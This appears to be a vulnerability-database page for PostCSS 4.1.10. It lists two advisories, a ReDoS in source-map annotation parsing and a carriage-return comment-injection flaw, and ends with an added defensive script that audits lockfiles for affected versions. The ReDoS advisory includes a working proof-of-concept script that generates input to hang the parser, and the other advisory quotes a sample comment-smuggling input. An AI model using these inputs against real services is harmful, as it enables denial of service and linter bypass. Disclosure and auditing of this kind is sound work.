PostCSS version 4.1.10 represents a minor update to the popular CSS transformation tool, following version 4.1.9. Both versions share the same core dependencies including js-base64, source-map and es6-promise, essential for handling Base64 encoding, source map generation, and polyfilling promises respectively. This ensures continued compatibility and consistent functionality for developers relying on these utilities. The update primarily involves modifications to the development dependencies. Notably, fs-extra was updated from version 0.18.2 to 0.18.3, yaspeller from 2.1.0 to 2.2.0, babel-core from 5.2.13 to 5.2.17, and gulp-eslint from 0.11.1 to 0.12.0. These changes likely incorporate bug fixes, performance improvements, and new features within the respective development tools. For developers integrating PostCSS into their workflow, this update improves the development experience and streamlines the process for code linting using ESLint, transpilation using Babel, and file system operations during build processes. This enhanced development environment ensures a more robust and efficient workflow when using PostCSS to transform CSS with JS plugins. While not introducing groundbreaking features, this incremental update demonstrates PostCSS's commitment to maintaining a reliable and up-to-date toolkit for developers.
All vulnerabilities related to version 4.1.10 of the package
Regular Expression Denial of Service in postcss
The package postcss, in versions before 7.0.36 or between 8.0.0 and 8.2.13, is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Build a stylesheet followed by n repeated, unterminated source-map annotations.
// The trailing "!" prevents the annotation regex from matching, forcing backtracking.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse of a well-formed annotation so module loading is not counted below.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Parse progressively longer inputs and log how the time cost grows with length.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contain parts that PostCSS parses as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite having originally been inside a comment.
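Both advisories above are stated as version ranges, and a project often carries more than one copy of postcss through transitive dependencies. The following Node.js script is an added example, not code from the PostCSS project or from the advisories: it encodes the two affected ranges exactly as this page states them, walks a package-lock.json for every installed postcss copy, and reports which advisory applies to each. It assumes "between 8.0.0 and 8.2.13" means 8.0.0 inclusive up to but excluding 8.2.13, compares release numbers only (prerelease and build tags are ignored), and uses a constructed lockfile fragment in place of a real one.

```javascript
// Added example (not from the PostCSS project or the advisory text): flag which of the
// two advisories described on this page apply to a given postcss version, and pull
// every postcss copy out of a package-lock.json so transitive duplicates are not missed.

// Affected ranges as stated on this page. "between 8.0.0 and 8.2.13" is read here as
// >= 8.0.0 and < 8.2.13 (assumption: the upper bound is the fixed release).
const ADVISORIES = [
  {
    name: 'Regular Expression Denial of Service in postcss',
    ranges: [
      { min: null, max: '7.0.36' },     // before 7.0.36
      { min: '8.0.0', max: '8.2.13' },  // 8.0.0 <= v < 8.2.13
    ],
  },
  {
    name: 'PostCSS line return parsing error',
    ranges: [{ min: null, max: '8.4.31' }], // before 8.4.31
  },
];

// Parse "MAJOR.MINOR.PATCH" with optional -prerelease/+build tags. Tags are dropped:
// this check compares release numbers only (a simplification, not full semver).
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?$/.exec(v.trim());
  if (!m) throw new Error(`unrecognised version string: ${v}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

// Numeric, component-wise comparison: negative if a < b, 0 if equal, positive if a > b.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] - pb[i];
  }
  return 0;
}

// A range matches when version >= min (if a min is given) and version < max.
function inRange(version, { min, max }) {
  if (min !== null && compareVersions(version, min) < 0) return false;
  return compareVersions(version, max) < 0;
}

// Names of the advisories on this page whose affected range contains `version`.
function affectedAdvisories(version) {
  return ADVISORIES
    .filter(a => a.ranges.some(r => inRange(version, r)))
    .map(a => a.name);
}

// Collect every installed postcss version from package-lock.json text.
// Handles lockfileVersion 1 (nested "dependencies" tree) and 2/3 ("packages" map
// keyed by node_modules path), so nested duplicate copies are reported too.
function postcssVersionsFromLock(lockText) {
  const lock = JSON.parse(lockText);
  const found = new Set();
  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path.endsWith('node_modules/postcss') && meta.version) found.add(meta.version);
    }
  }
  const walk = deps => {
    for (const [name, meta] of Object.entries(deps || {})) {
      if (name === 'postcss' && meta.version) found.add(meta.version);
      walk(meta.dependencies);
    }
  };
  walk(lock.dependencies);
  return [...found].sort(compareVersions);
}

// Constructed lockfile fragment (not from any real project): a direct postcss 8.4.31
// plus a transitive, outdated 4.1.10 copy pulled in by a hypothetical plugin.
const SAMPLE_LOCK = JSON.stringify({
  name: 'sample-app', lockfileVersion: 1,
  dependencies: {
    postcss: { version: '8.4.31' },
    'some-old-plugin': {
      version: '1.0.0',
      dependencies: { postcss: { version: '4.1.10' } },
    },
  },
});

// Map each installed postcss version to the advisories that apply to it.
function auditLock(lockText) {
  const report = {};
  for (const v of postcssVersionsFromLock(lockText)) report[v] = affectedAdvisories(v);
  return report;
}

console.log(JSON.stringify(auditLock(SAMPLE_LOCK), null, 2));
```

On the constructed lockfile the report lists 8.4.31 with no advisories and 4.1.10 with both, which is the point of walking the whole tree: the top-level version being current says nothing about the copies a plugin brings in underneath it.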